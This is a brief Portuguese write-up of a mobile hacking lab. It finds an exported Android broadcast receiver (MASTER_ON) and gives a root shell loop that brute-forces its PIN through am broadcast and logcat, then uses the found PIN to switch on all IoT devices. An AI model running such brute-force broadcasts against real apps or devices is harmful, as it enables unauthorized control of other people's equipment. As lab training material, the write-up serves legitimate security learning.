Ao analisár o AndoidManifest.xml é possivel verificar que o Recever a baixo está setado como exported="true", referente à action MASTER_ON revela uma superfície de ataque potencial.
É necessario acesso de root para poder ter permissão no logcat
emulator64_x86_64_arm64:/ $ su
Podemos fazer um brute force no PIN e verificar se os dispositivos foram ligados com logcat.
emulator64_x86_64_arm64:/ # for i in $(seq 0 9999); do logcat -c && am broadcast -a MASTER_ON --ei key $i > /dev/null && sleep 0.3 && logcat -d | grep -q "Turning all devices on" && echo "[+] PIN FOUND: $i" && break; done
Depois de identificar o PIN é so utilizar enviando um broadcast para ligar os dispositivos.
emulator64_x86_64_arm64:/ # am broadcast -a MASTER_ON --ei key 345
am broadcast -a MASTER_ON --ei key 345
https://riptutorial.com/android/example/10642/sending-broadcast
https://www.mobilehackinglab.com/path-player?courseid=lab-iot-connect









